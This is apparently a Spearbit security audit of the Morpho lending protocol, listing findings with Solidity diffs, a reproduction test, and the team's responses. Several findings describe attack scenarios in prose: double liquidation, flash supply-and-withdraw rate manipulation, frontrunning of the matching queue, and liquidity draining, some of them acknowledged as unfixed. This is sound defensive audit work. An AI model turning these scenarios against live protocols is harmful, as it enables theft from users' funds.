Recommendation: Consider reusing the AmountIsZero() custom error in this function to prevent safeTransfer() from being called, as well as the ReserveFeeClaimed event from being emitted, if amountToClaim is 0.

 ERC20 underlyingToken = ERC20(IAToken(_poolTokenAddress).UNDERLYING_ASSET_ADDRESS());
 uint256 amountToClaim = underlyingToken.balanceOf(address(this));
+if (amountToClaim == 0) revert AmountIsZero();
 underlyingToken.safeTransfer(treasuryVault, amountToClaim);
 emit ReserveFeeClaimed(_poolTokenAddress, amountToClaim);

Morpho: Recommendation added in PR #562.
Spearbit: Acknowledged.

5.6 Informational

+5.6.1 matchingEngine should be initialized in PositionsManagerForAaveLogic's initialize function

Severity: Informational
Context: PositionsManagerForAaveLogic.sol#L38
Description: MatchingEngineForAave inherits from PositionsManagerForAaveStorage, which is a UUPSUpgradeable contract. Following UUPS best practices, the MatchingEngineForAave deployed by PositionsManagerForAaveLogic should also be initialized.

Recommendation: Initialize MatchingEngineForAave when it is created and deployed by PositionsManagerForAaveLogic.initialize.

Morpho: Now we are using the transparent proxy pattern instead of the UUPS one, as the contract exceeds the max size for deployment. I propose to ignore this issue, or to update it in case the transparent proxy pattern has an issue as well.

Spearbit: Acknowledged; just be sure to follow OZ best practices on contract initialization during the deployment phase.
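Editor's note: a minimal sketch of the recommendation inside PositionsManagerForAaveLogic.initialize. The engine's initialize() entry point shown here is hypothetical; whatever initializer the engine actually exposes should be called atomically with its deployment:

 function initialize( /* ... */ ) external initializer {
     // ...
     matchingEngine = new MatchingEngineForAave();
+    // Hypothetical initializer call: invoking it in the same transaction as the
+    // deployment ensures no third party can initialize the fresh engine first.
+    matchingEngine.initialize();
     // ...
 }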
+5.6.2 Misc: notation, style guide, global unit types, etc.

Severity: Informational
Context: SwapManagerUniV2.sol#L25, SwapManagerUniV3.sol#L28, SwapManagerUniV3.sol#L29, SwapManagerUniV3OnEth.sol#L23, SwapManagerUniV3OnEth.sol#L24, SwapManagerUniV3OnEth.sol#L33, SwapManagerUniV3OnEth.sol#L34, MarketsManagerForAave.sol#L32, MarketsManagerForAave.sol#L33
Description: Follow Solidity notation, the standard style guide and global unit types to improve readability.

Recommendation: Consider implementing the following changes.

SwapManagerUniV2.sol

-uint256 public constant MAX_BASIS_POINTS = 10000; // 100% in basis points.
+uint256 public constant MAX_BASIS_POINTS = 10_000; // 100% in basis points.

SwapManagerUniV3.sol

-uint32 public constant TWAP_INTERVAL = 3600; // 1 hour interval.
+uint32 public constant TWAP_INTERVAL = 1 hours; // 1 hour interval.
-uint256 public constant MAX_BASIS_POINTS = 10000; // 100% in basis points.
+uint256 public constant MAX_BASIS_POINTS = 10_000; // 100% in basis points.

SwapManagerUniV3OnEth.sol

-uint32 public constant TWAP_INTERVAL = 3600; // 1 hour interval.
+uint32 public constant TWAP_INTERVAL = 1 hours; // 1 hour interval.
-uint256 public constant MAX_BASIS_POINTS = 10000; // 100% in basis points.
+uint256 public constant MAX_BASIS_POINTS = 10_000; // 100% in basis points.
-uint24 public constant FIRST_POOL_FEE = 3000; // Fee on Uniswap for stkAAVE/AAVE pool.
+uint24 public constant FIRST_POOL_FEE = 3_000; // Fee on Uniswap for stkAAVE/AAVE pool.
-uint24 public constant SECOND_POOL_FEE = 3000; // Fee on Uniswap for AAVE/WETH9 pool.
+uint24 public constant SECOND_POOL_FEE = 3_000; // Fee on Uniswap for AAVE/WETH9 pool.

MarketsManagerForAave.sol

-uint16 public constant MAX_BASIS_POINTS = 10000; // 100% in basis point.
+uint16 public constant MAX_BASIS_POINTS = 10_000; // 100% in basis point.
-uint16 public constant HALF_MAX_BASIS_POINTS = 5000; // 50% in basis point.
+uint16 public constant HALF_MAX_BASIS_POINTS = 5_000; // 50% in basis point.

Morpho: Part of the recommendations have been applied in PR #561.
Spearbit: Acknowledged.

+5.6.3 Outdated or wrong Natspec documentation

Severity: Informational
Context:
• SwapManagerUniV3.sol#L55-L57
• PositionsManagerForAaveGettersSetters.sol#L52
• PositionsManagerForAaveGettersSetters.sol#L115-L120
Description: Some Natspec documentation is missing parameters/return values or has not been updated to reflect the function code.

Recommendation: Consider implementing the following changes.

SwapManagerUniV3.sol

 /// @notice Constructs the SwapManagerUniV3 contract.
 /// @param _morphoToken The Morpho token address.
+/// @param _morphoPoolFee TODO: ADD CORRECT DOC
 /// @param _rewardToken The reward token address.
+/// @param _rewardPoolFee TODO: ADD CORRECT DOC
 constructor(
     address _morphoToken,
     uint24 _morphoPoolFee,
     address _rewardToken,
     uint24 _rewardPoolFee
 ) {
     // ...
 }

PositionsManagerForAaveGettersSetters.sol

-/// @notice Sets the `_newTreasuryVaultAddress`.
+/// @notice Sets the `treasuryVault`.
 /// @param _newTreasuryVaultAddress The address of the new `treasuryVault`.
 function setTreasuryVault(address _newTreasuryVaultAddress) external onlyOwner {
     treasuryVault = _newTreasuryVaultAddress;
     emit TreasuryVaultSet(_newTreasuryVaultAddress);
 }

-/// @notice Returns the collateral value, debt value and max debt value of a given user (in ETH).
+/// @notice Returns the collateral value, debt value, max debt value and liquidation value of a given user (in ETH).
 /// @param _user The user to determine liquidity for.
 /// @return collateralValue The collateral value of the user (in ETH).
 /// @return debtValue The current debt value of the user (in ETH).
 /// @return maxDebtValue The maximum possible debt value of the user (in ETH).
 /// @return liquidationValue The value which made liquidation possible (in ETH).
 function getUserBalanceStates(address _user)
     external
     view
     returns (
         uint256 collateralValue,
         uint256 debtValue,
         uint256 maxDebtValue,
         uint256 liquidationValue
     )
 {
     // ...
 }

Morpho: Applied in PR #561.
Spearbit: Acknowledged.
+5.6.4 Use the official UniswapV3 0.8 branch

Severity: Informational
Context: uniswap/*
Description: The current repository creates local copies of the UniswapV3 codebase and manually migrates the contracts to Solidity 0.8.

Recommendation: There are issues with the current migration which can be avoided by using the official Uniswap V3 0.8 branch.

Morpho: Agreed, added as a dependency in PR #550.
Spearbit: Acknowledged.

+5.6.5 Unused events and unindexed event parameters

Severity: Informational
Context:
• RewardsManagerForAave.sol#L37
• RewardsManagerForAave.sol#L43
• SwapManagerUniV2.sol#L47
• SwapManagerUniV3.sol#L51
• SwapManagerUniV3OnEth.sol#L47
• MarketsManagerForAave.sol#L53
• MarketsManagerForAave.sol#L57
• MarketsManagerForAave.sol#L62
• MarketsManagerForAave.sol#L68-L72
• MarketsManagerForAave.sol#L78-L82
• MarketsManagerForAave.sol#L87
• PositionsManagerForAaveEventsErrors.sol#L97
• PositionsManagerForAaveEventsErrors.sol#L101
• PositionsManagerForAaveEventsErrors.sol#L105
• PositionsManagerForAaveEventsErrors.sol#L110
• PositionsManagerForAaveEventsErrors.sol#L115
• PositionsManagerForAaveEventsErrors.sol#L120
• PositionsManagerForAaveEventsErrors.sol#L125
• PositionsManagerForAaveEventsErrors.sol#L131
Description: Certain parameters should be defined as indexed to track them from web3 applications / security monitoring tools.

Recommendation: Define such parameters as indexed and remove unused events from the code base.

contracts/aave/RewardsManagerForAave.sol

-event AaveIncentivesControllerSet(address _aaveIncentivesController);
+event AaveIncentivesControllerSet(address indexed _aaveIncentivesController);
-event UserIndexUpdated(address _user, address _poolTokenAddress, uint256 _index);
+event UserIndexUpdated(address indexed _user, address indexed _poolTokenAddress, uint256 _index);

contracts/common/SwapManagerUniV2.sol

-event Swapped(address _receiver, uint256 _amountIn, uint256 _amountOut);
+event Swapped(address indexed _receiver, uint256 _amountIn, uint256 _amountOut);

contracts/common/SwapManagerUniV3.sol

-event Swapped(address _receiver, uint256 _amountIn, uint256 _amountOut);
+event Swapped(address indexed _receiver, uint256 _amountIn, uint256 _amountOut);

contracts/common/SwapManagerUniV3OnEth.sol

-event Swapped(address _receiver, uint256 _amountIn, uint256 _amountOut);
+event Swapped(address indexed _receiver, uint256 _amountIn, uint256 _amountOut);

contracts/aave/MarketsManagerForAave.sol

-event MarketCreated(address _marketAddress);
+event MarketCreated(address indexed _marketAddress);
-event PositionsManagerSet(address _positionsManager);
+event PositionsManagerSet(address indexed _positionsManager);
-event NoP2PSet(address _marketAddress, bool _noP2P);
+event NoP2PSet(address indexed _marketAddress, bool _noP2P);
-event P2PSPYsUpdated(
-    address _marketAddress,
-    uint256 _newSupplyP2PSPY,
-    uint256 _newBorrowP2PSPY
-);
+event P2PSPYsUpdated(
+    address indexed _marketAddress,
+    uint256 _newSupplyP2PSPY,
+    uint256 _newBorrowP2PSPY
+);
-event P2PExchangeRatesUpdated(
-    address _marketAddress,
-    uint256 _newSupplyP2PExchangeRate,
-    uint256 _newBorrowP2PExchangeRate
-);
+event P2PExchangeRatesUpdated(
+    address indexed _marketAddress,
+    uint256 _newSupplyP2PExchangeRate,
+    uint256 _newBorrowP2PExchangeRate
+);

contracts/aave/positions-manager-parts/PositionsManagerForAaveEventsErrors.sol

-event TreasuryVaultSet(address _newTreasuryVaultAddress);
+event TreasuryVaultSet(address indexed _newTreasuryVaultAddress);
-event RewardsManagerSet(address _newRewardsManagerAddress);
+event RewardsManagerSet(address indexed _newRewardsManagerAddress);
-event AaveIncentivesControllerSet(address _aaveIncentivesController);
+event AaveIncentivesControllerSet(address indexed _aaveIncentivesController);
-event PauseStatusSet(address _poolTokenAddress, bool _newStatus);
+event PauseStatusSet(address indexed _poolTokenAddress, bool _newStatus);
-event ReserveFeeClaimed(address _poolTokenAddress, uint256 _amountClaimed);
+event ReserveFeeClaimed(address indexed _poolTokenAddress, uint256 _amountClaimed);
-event RewardsClaimed(address _user, uint256 _amountClaimed);
+event RewardsClaimed(address indexed _user, uint256 _amountClaimed);
-event RewardsClaimedAndSwapped(address _user, uint256 _amountIn, uint256 _amountOut);
+event RewardsClaimedAndSwapped(address indexed _user, uint256 _amountIn, uint256 _amountOut);

The following event should be removed from the code base because it is never used:

contracts/aave/positions-manager-parts/PositionsManagerForAaveEventsErrors.sol

-event FeesClaimed(address _poolTokenAddress, uint256 _amountClaimed);

Morpho: Fixes have been implemented in PR #552.
Spearbit: Acknowledged.

+5.6.6 Rewards are ignored in the on-pool rate computation

Severity: Informational
Context: Protocol level
Description: Morpho claims that the protocol is a strict improvement upon the underlying lending protocols. It tries to match as many suppliers and borrowers P2P at the supply/borrow mid-rate of the underlying protocol. However, given high reward incentives paid out to on-pool users, it could be the case that being on the pool yields a better rate than the P2P rate.

Recommendation: While Morpho pays forward the reward incentives to on-pool users, it tries to match all users P2P first. Users should be aware of this fact and lend/borrow directly from the underlying protocol instead of being matched P2P by Morpho if they want to maximize their rates.

Morpho: This is the purpose of noP2P, which disables P2P matching for a given market.
Spearbit: Acknowledged.
+5.6.7 User transfer AToken to Morpho or deposit on behalf of Morpho

Severity: Informational
Context: Protocol Level
Description: Link to Aave LendingPool.sol: "onBehalfOf — The address that will receive the aTokens, same as msg.sender if the user wants to receive them on his own wallet, or a different address if the beneficiary of aTokens is a different wallet." This method could allow anyone to deposit some underlying on Aave and mint the respective aTokens directly to Morpho (address(morphoPositionManager)). The result is the same as if someone directly transferred some aTokens to Morpho (address(morphoPositionManager)). Consequences:
• Morpho would have "stuck" free aTokens on address(positionManager) that cannot be redeemed for the underlying.
• Morpho's health factor on Aave would look better, because it appears as if Morpho were supplying more collateral.

Morpho: No real reason to fix this. It is true for all contracts.
Spearbit: Acknowledged.
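Editor's note: a short illustration of the deposit variant described above. LendingPool.deposit with an onBehalfOf parameter is Aave v2's real entry point; dai, lendingPool and morphoPositionsManager are placeholders:

// Mints 1,000 aDAI directly to Morpho's positions manager, which has no
// corresponding accounting entry for them.
IERC20(dai).approve(address(lendingPool), 1_000e18);
lendingPool.deposit(dai, 1_000e18, address(morphoPositionsManager), 0);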
diff --git a/findings_newupdate/spearbit/MorphoV1-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/MorphoV1-Spearbit-Security-Review.txt
new file mode 100644
index 0000000..6dceecf
--- /dev/null
+++ b/findings_newupdate/spearbit/MorphoV1-Spearbit-Security-Review.txt
@@ -0,0 +1,51 @@
+5.1.1 Liquidating Morpho's Aave position leads to state desync

Severity: High Risk
Context: ExitPositionsManager.sol#L239
Description: Morpho has a single position on Aave that encompasses all of Morpho's individual user positions that are on the pool. When this Aave Morpho position is liquidated, the user position state tracked in Morpho desyncs from the actual Aave position. This leads to issues when users try to withdraw their collateral or repay their debt from Morpho. It's also possible to double-liquidate for a profit.

Example: There's a single borrower B1 on Morpho who is connected to the Aave pool.
• B1 supplies 1 ETH and borrows 2500 DAI. This creates a position on Aave for Morpho.
• The ETH price crashes and the position becomes liquidatable.
• A liquidator liquidates the position on Aave, earning the liquidation bonus. They repaid some debt and seized some collateral for profit.
• This repaid debt / removed collateral is not synced with Morpho. The user's supply and debt balances remain 1 ETH and 2500 DAI. The same user on Morpho can be liquidated again because Morpho uses the exact same liquidation parameters as Aave.
• The Morpho liquidation call again repays debt on the Aave position and withdraws collateral with a second liquidation bonus.
• The state remains desynced.

Recommendation: Liquidating the Morpho position should not break core functionality for Morpho users.

Morpho: We will not implement any "direct" fix inside the code.
Spearbit: Acknowledged.

5.2 Medium Risk

+5.2.1 A market could be deprecated but still prevent liquidators from liquidating borrowers if isLiquidateBorrowPaused is true

Severity: Medium Risk
Context: aave-v2/MorphoGovernance.sol#L358-L366, compound/MorphoGovernance.sol#L368-L376
Description: Currently, when a market must be deprecated, Morpho checks that borrowing has been paused before applying the new value of the flag.

function setIsDeprecated(address _poolToken, bool _isDeprecated)
    external
    onlyOwner
    isMarketCreated(_poolToken)
{
    if (!marketPauseStatus[_poolToken].isBorrowPaused) revert BorrowNotPaused();
    marketPauseStatus[_poolToken].isDeprecated = _isDeprecated;
    emit IsDeprecatedSet(_poolToken, _isDeprecated);
}

The same check should be done for isLiquidateBorrowPaused, allowing the deprecation of a market only if isLiquidateBorrowPaused == false; otherwise liquidators would not be able to liquidate borrowers on a deprecated market.

Recommendation: Prevent the deprecation of a market if the isLiquidateBorrowPaused flag is set to true. Consider also checking the isDeprecated flag in setIsLiquidateBorrowPaused, to prevent pausing liquidations on a deprecated market. If Morpho implements this specific behavior, it should also be aware of the issue described in "setIsPausedForAllMarkets bypasses the check done in setIsBorrowPaused and allows resuming borrow on a deprecated market".

Morpho: We acknowledge this issue. The reason behind this is the following: given what @MathisGD said, if we want to be consistent we should prevent pausing the borrow liquidation on a deprecated asset. However, there might be an issue (we don't know) with the borrow liquidation, and the operator would not be able to pause it. For this reason, we prefer to leave things as they are.

Spearbit: Acknowledged.
+5.2.2 setIsPausedForAllMarkets bypasses the check done in setIsBorrowPaused and allows resuming borrow on a deprecated market

Severity: Medium Risk
Context: aave-v2/MorphoGovernance.sol#L470, compound/MorphoGovernance.sol#L470
Description: The MorphoGovernance contract allows Morpho to set isBorrowPaused to false only if the market is not deprecated.

function setIsBorrowPaused(address _poolToken, bool _isPaused)
    external
    onlyOwner
    isMarketCreated(_poolToken)
{
    if (!_isPaused && marketPauseStatus[_poolToken].isDeprecated) revert MarketIsDeprecated();
    marketPauseStatus[_poolToken].isBorrowPaused = _isPaused;
    emit IsBorrowPausedSet(_poolToken, _isPaused);
}

This check is not enforced by the _setPauseStatus function, called by setIsPausedForAllMarkets, allowing Morpho to resume borrowing on a deprecated market.

Test to reproduce the issue:

// SPDX-License-Identifier: AGPL-3.0-only
pragma solidity ^0.8.0;

import "./setup/TestSetup.sol";

contract TestSpearbit is TestSetup {
    using WadRayMath for uint256;

    function testBorrowPauseCheckSkipped() public {
        // Deprecate a market.
        morpho.setIsBorrowPaused(aDai, true);
        morpho.setIsDeprecated(aDai, true);
        checkPauseEquality(aDai, true, true);

        // You cannot resume borrowing if the market is deprecated.
        hevm.expectRevert(abi.encodeWithSignature("MarketIsDeprecated()"));
        morpho.setIsBorrowPaused(aDai, false);
        checkPauseEquality(aDai, true, true);

        // But this check is skipped when calling `setIsPausedForAllMarkets` directly.
        // This should revert, because you cannot resume borrowing on a deprecated market.
        morpho.setIsPausedForAllMarkets(false);
        checkPauseEquality(aDai, false, true);
    }

    function checkPauseEquality(
        address aToken,
        bool shouldBePaused,
        bool shouldBeDeprecated
    ) public {
        (
            bool isSupplyPaused,
            bool isBorrowPaused,
            bool isWithdrawPaused,
            bool isRepayPaused,
            bool isLiquidateCollateralPaused,
            bool isLiquidateBorrowPaused,
            bool isDeprecated
        ) = morpho.marketPauseStatus(aToken);
        assertEq(isBorrowPaused, shouldBePaused);
        assertEq(isDeprecated, shouldBeDeprecated);
    }
}

Recommendation: One possible solution is to follow the same approach implemented in the aave-v3 codebase: isBorrowPaused is updated if and only if the market is not deprecated. See the sketch below.

Morpho: This issue has been fixed in PR 1642.
Spearbit: Verified.
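Editor's note: a minimal sketch of the aave-v3-style guard inside the helper used by setIsPausedForAllMarkets. The flag names follow the marketPauseStatus tuple in the test above; the struct path and the exact shape of PR 1642 may differ:

function _setPauseStatus(address _poolToken, bool _isPaused) internal {
    Types.MarketPauseStatus storage pause = marketPauseStatus[_poolToken]; // struct path illustrative
    pause.isSupplyPaused = _isPaused;
    pause.isWithdrawPaused = _isPaused;
    pause.isRepayPaused = _isPaused;
    pause.isLiquidateCollateralPaused = _isPaused;
    pause.isLiquidateBorrowPaused = _isPaused;
    // Only touch the borrow pause when doing so would not resume borrowing
    // on a deprecated market.
    if (_isPaused || !pause.isDeprecated) {
        pause.isBorrowPaused = _isPaused;
        emit IsBorrowPausedSet(_poolToken, _isPaused);
    }
}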
7 • The attacker immediately withdraws the supplied amount again. The protocol now attempts to demote the borrowers and reconnect them to the pool. But the algorithm performs a "hard withdraw" as the last step if it reaches the max iteration limit, creating a borrower delta. These are funds borrowed from the pool (at a higher borrowing rate) that are still wrongly recorded to be in a P2P position for some borrowers. This increase in borrowing rate is socialized equally among all P2P borrowers. (reflected in an updated p2pBorrowRate as the shareOfDelta increased.) • The initial P2P borrowers earn a worse rate than before. If the borrower delta is large, it's close to the on-pool rate. • If an attacker-controlled borrower account was newly matched P2P and not properly reconnected to the pool (in the "demote borrowers" step of the algorithm), they will earn a better P2P rate than the on-pool rate they earned before. Recommendation: Consider mitigations for single-transaction flash supply & withdraw attacks. Morpho: We acknowledge the risk and won't be fixing this issue, as we might want to refactor the entire queue system at some point. Spearbit: Acknowledged. +5.2.5 Frontrunners can exploit system by not allowing head of DLL to match in P2P Severity: Medium Risk Context: MatchingEngine.sol Description: For a given asset x, liquidity is supplied on the pool since there are not enough borrowers. suppli- ersOnPool head: 0xa with 1000 units of x whenever there is a new transaction in the mempool to borrow 100 units of x, • Frontrunner supplies 1001 units of x and is supplied on pool. • updateSuppliers will put the frontrunner on the head (assuming very high gas is supplied). • Borrower's transaction lands and is matched 100 units of x with a frontrunner in p2p. • Frontrunner withdraws the remaining 901 left which was on the underlying pool. Favorable conditions for an attack: • Relatively fewer gas fees & relatively high block gas limit. • insertSorted is able to traverse to head within block gas limit (i.e length of DLL). Since this is a non-atomic sandwich, the frontrunner needs excessive capital for a block's time period. Recommendation: Consider mitigations for frontrunning sandwich attacks. Morpho: We acknowledge this issue and we are currently searching for better matching engine mechanisms. Though, as we must prevent the protocol from DDOs attacks a classic FIFO is not possible. We'll keep the matching engine like it is as the result of the front-running attack you mentioned is similar to a whale with huge capital which would be at the head of the list. Spearbit: Acknowledged. 8 +5.2.6 Differences between Morpho and Compound borrow validation logic Severity: Medium Risk Context: compound/PositionsManager.sol#L336-L344 Description: The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both logic, we have noticed that there are some differences between them; • Compound has a mechanism to prevent borrows if the new borrowed amount would go above the current borrowCaps[cToken] threshold. Morpho does not check this threshold and could allow users to borrow on the P2P side (avoiding the revert because it would not trigger the underlying compound borrow action). Morpho should anyway monitor the borrowCaps of the market because it could make increaseP2PDeltasLogic and _unsafeWithdrawLogic reverts. 
+5.2.5 Frontrunners can exploit the system by not allowing the head of the DLL to match in P2P Severity: Medium Risk Context: MatchingEngine.sol Description: For a given asset x, liquidity is supplied on the pool since there are not enough borrowers; suppliersOnPool head: 0xa with 1000 units of x. Whenever there is a new transaction in the mempool to borrow 100 units of x:
• The frontrunner supplies 1001 units of x and is supplied on the pool.
• updateSuppliers will put the frontrunner at the head (assuming very high gas is supplied).
• The borrower's transaction lands and is matched for 100 units of x with the frontrunner in P2P.
• The frontrunner withdraws the remaining 901 units which were left on the underlying pool.
Favorable conditions for an attack:
• Relatively low gas fees & a relatively high block gas limit.
• insertSorted is able to traverse to the head within the block gas limit (i.e. the length of the DLL).
Since this is a non-atomic sandwich, the frontrunner needs excessive capital for a block's time period. Recommendation: Consider mitigations for frontrunning sandwich attacks. Morpho: We acknowledge this issue and we are currently searching for better matching engine mechanisms. However, as we must protect the protocol from DDoS attacks, a classic FIFO is not possible. We'll keep the matching engine as it is, since the result of the front-running attack you mentioned is similar to a whale with huge capital sitting at the head of the list. Spearbit: Acknowledged.
+5.2.6 Differences between Morpho and Compound borrow validation logic Severity: Medium Risk Context: compound/PositionsManager.sol#L336-L344 Description: The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both, we have noticed some differences between them:
• Compound has a mechanism to prevent borrows if the new borrowed amount would go above the current borrowCaps[cToken] threshold. Morpho does not check this threshold and could allow users to borrow on the P2P side (avoiding the revert because it would not trigger the underlying Compound borrow action). Morpho should in any case monitor the borrowCaps of the market because it could make increaseP2PDeltasLogic and _unsafeWithdrawLogic revert.
• Both Morpho and Compound do not check if a market is in the "deprecated" state. This means that as soon as a user borrows some tokens, he/she can be instantly liquidated by another user. – If the flag is true on Compound, the Morpho user can be liquidated directly on Compound. – If the flag is true on Morpho, the borrower can be liquidated on Morpho.
• Morpho does not check borrowGuardianPaused[cToken] on Compound; a user could be able to borrow in P2P while the cToken market has borrowing paused.
More detailed information can be found in the discussion topic "Differences in actions checks between Morpho and Compound". Recommendation: Consider implementing the missing logic/sanity checks or documenting why those checks should not be added to Morpho's implementation. Morpho: Here are the motivations behind not implementing the flags: 1. No amount of checks will be sufficient, and the Morpho Operator should be proactive about pausing before the underlying pool does. 2. Hardcoding can actually reduce flexibility in Morpho's pausing discretion since one action on Morpho can actually constitute multiple types of interactions with the pool. 3. Some checks are gas intensive as information from the pool needs to be fetched. Spearbit: Acknowledged.
+5.2.7 Users can continue to borrow from a deprecated market Severity: Medium Risk Context: aave-v2/MorphoGovernance.sol#L395, compound/MorphoGovernance.sol#L372 Description: When a market is being marked as deprecated, there is no verification that borrowing for that market has already been disabled. This means a user could borrow from this market and immediately be eligible to be liquidated. Recommendation: A couple of options: • Add a require or modifier to ensure borrowing has been disabled, and revert if not. • Disable borrowing as part of deprecating the market. Morpho: Fixed in PR 1551. Spearbit: Verified. After the PR change, to be able to deprecate a market, Morpho must pause the borrowing state; otherwise, the transaction will revert. When both the borrow state is paused and the market is deprecated, if Morpho wants to "reset" those values (borrow not paused, and the market not deprecated), Morpho must "un-deprecate" it and only then "un-pause" it. Note: Morpho should check that all the markets created are both not deprecated and not borrow-paused before deploying the PR, to be sure not to enter a case where the new checks would not work or would prevent resetting the flags because the system is in an inconsistent state.
+5.2.8 ERC20 tokens with transfer fees are not handled by *PositionsManager Severity: Medium Risk Context: PositionsManager.sol, EntryPositionsManager.sol, ExitPositionsManager.sol Description: Some ERC20 tokens could have fees attached to the transfer event, while others could enable them in the future (see USDT, USDC). The current implementation of both PositionsManagers (for Aave and Compound) does not take these types of ERC20 tokens into consideration. While Aave seems not to take this behavior into consideration (see LendingPool.sol), Compound, on the other hand, explicitly handles it inside the doTransferIn function. Morpho takes for granted that the amount specified by the user will be the amount transferred to the contract's balance, while in reality the contract will receive less. In supplyLogic, for example, Morpho will account the full amount to the user's p2p/pool balance but will repay/supply to the pool less than the amount accounted for. Recommendation: Consider updating the *PositionsManager logic to track the real amount of tokens that has been sent by the user after the transfer (difference between the balances before and after), but also the amount of tokens that have been supplied/borrowed/withdrawn/... given that Morpho itself is doing a second transfer/transferFrom to/from the Aave/Compound protocol. Morpho: We updated the asset listing checklist. However, given the small likelihood of USDC and USDT turning on fees, we decided not to implement the recommendations. Spearbit: Verified the checklist, and acknowledged that the recommendations will not be implemented.
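A minimal sketch of the balance-diff pattern the recommendation above describes (the helper name is hypothetical; Compound's doTransferIn applies the same idea; safeTransferFrom assumes a SafeTransferLib/SafeERC20-style wrapper is in scope):

// Measure what actually arrived instead of trusting `_amount`.
function _transferInAndMeasure(
    ERC20 _token,
    address _from,
    uint256 _amount
) internal returns (uint256 received) {
    uint256 balanceBefore = _token.balanceOf(address(this));
    _token.safeTransferFrom(_from, address(this), _amount);
    // For fee-on-transfer tokens, `received` can be lower than `_amount`;
    // all subsequent accounting should use `received`.
    received = _token.balanceOf(address(this)) - balanceBefore;
}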
+5.2.9 Cannot liquidate Morpho users if there is no liquidity on the pool Severity: Medium Risk Context: aave-v2/ExitPositionsManager.sol#L277 Description: Morpho implements liquidations by repaying the borrowed asset and then withdrawing the collateral asset from the underlying protocol (Aave / Compound). If there is no liquidity in the collateral asset pool, the liquidation will fail. Morpho could incur bad debt as they cannot liquidate the user. The liquidation mechanisms of Aave and Compound work differently: they allow the liquidator to seize the debtor's aTokens/cTokens, which can later be withdrawn for the underlying token once there is enough liquidity in the pool. Technically, an attacker could even force no liquidity on the pool by frontrunning liquidations and borrowing the entire pool amount - preventing themselves from being liquidated on Morpho. However, this would require significant capital as collateral in most cases. Recommendation: Think about adding a similar feature where liquidators can seize aTokens/cTokens instead of withdrawing underlying tokens from the pool. The aTokens/cTokens of all pool users are already in the Morpho contract and thus in Morpho's control. Note that this would only work with onPool balances but not with inP2P balances, as these don't mint aTokens/cTokens. Morpho: As it requires large changes in the liquidation process, we decided not to implement this recommendation in the current codebase. Spearbit: Acknowledged.
+5.2.10 Supplying and borrowing can recreate P2P credit lines even if P2P is disabled Severity: Medium Risk Context: compound/PositionsManager.sol#L258, compound/PositionsManager.sol#L354, aave-v2/EntryPositionsManager.sol#L117, aave-v2/EntryPositionsManager.sol#L215 Description: When supplying/borrowing, the algorithm tries to reduce the p2pBorrowDelta/p2pSupplyDelta deltas by moving borrowers/suppliers back to P2P. It is not checked whether P2P is enabled. This has consequences when governance disables P2P and wants to put users and liquidity back on the pool through increaseDelta calls: the users could enter P2P again by supplying and borrowing. Recommendation: Disable the initial delta-matching step in supply and borrow if P2P is disabled (see the sketch after this finding). The reason why this only needs to be done for supply and borrow and not for repay and withdraw is that for repay and withdraw, while we're also reducing the delta, we're not actually creating new P2P credit lines (p2pAmount also decreases, so the diff is zero). It can be seen as if we're unmatching our own P2P balance, reducing the delta, shifting our P2P balance to on-pool, and then withdrawing from the pool. Morpho: Fixed in PR 1453. Spearbit: Verified.
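A minimal sketch of the recommended guard inside the supply-side delta-matching step; the storage and variable names (p2pDisabled, delta, remainingToSupply) are assumptions based on the finding, not the exact codebase:

// Match the borrower delta only when P2P is enabled for this market.
if (!p2pDisabled[_poolToken] && delta.p2pBorrowDelta > 0) {
    uint256 matchedDelta = Math.min(
        delta.p2pBorrowDelta.mul(poolIndexes[_poolToken].poolBorrowIndex),
        remainingToSupply
    ); // amount of the delta this supply can absorb
    // ... reduce the delta and increase the supplier's inP2P balance here ...
}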
+5.2.11 In the Compound implementation, P2P indexes can be stale Severity: Medium Risk Context: PositionsManager.sol#L502-L505, MorphoUtils.sol#L119-L156, PositionsManager.sol#L344, PositionsManager.sol#L447 Description: The current implementation of MorphoUtils._isLiquidatable loops through all of the tokens that the user has supplied to/borrowed from. The scope of the function is to check whether the user can be liquidated or not by verifying that debtValue > maxDebtValue. Resolving "Compound liquidity computation uses outdated cached borrowIndex" implies that the Compound borrow index used is always up-to-date, but the P2P indexes associated with the token could still be out of date if the market has not been used recently and the underlying Compound indexes (on which the P2P indexes are based) have changed a lot. As a consequence, all the functions that rely on _isLiquidatable (liquidate, withdraw, borrow) could return a wrong result if the majority of the user's balance is on the P2P side (the problem is aggravated even further without resolving "Compound liquidity computation uses outdated cached borrowIndex"). Let's say, for example:
• Alice supplies ETH on the pool.
• Alice supplies BAT in P2P.
• Alice borrows some DAI.
At some point in time the ETH value goes down, but the interest rate of BAT goes up. If the P2P index of BAT had been kept correctly up-to-date, Alice would still have been solvent, but she gets liquidated by Bob, who calls liquidate(alice, ETH, DAI). Even by fixing "Compound liquidity computation uses outdated cached borrowIndex", Alice would still be liquidated because her entire collateral is in P2P and not on the pool. Recommendation: Consider following the same approach implemented in the Morpho-Aave implementation inside MorphoUtils._liquidityData, which always updates the indexes of the tokens that the user has supplied/borrowed. Unlike Aave, Morpho's Compound implementation does not have a maximum hard-cap limit, which means that the _isLiquidatable loop could possibly revert with an Out of Gas exception. Ultimately, Morpho should always remember to call updateP2PIndexes (for both Aave and Compound) before any logic inside the *PositionsManager (both Aave and Compound); a sketch of this ordering follows this finding. Morpho: Because liquidators are updating indexes to be able to perform liquidations, and because it would drastically increase the gas cost, we decided not to implement this recommendation. Spearbit: Acknowledged.
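A minimal sketch of the recommended ordering, with hypothetical names (enteredMarkets, _updateP2PIndexes), since the real storage layout may differ:

// Refresh every market the user has entered before evaluating solvency,
// so _isLiquidatable never reads stale P2P indexes.
function _updateIndexesForAllMarketsOf(address _user) internal {
    address[] memory markets = enteredMarkets[_user]; // hypothetical storage
    for (uint256 i; i < markets.length; ++i) _updateP2PIndexes(markets[i]);
}
// ...and only then evaluate _isLiquidatable(_user, ...) in liquidate/withdraw/borrow.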
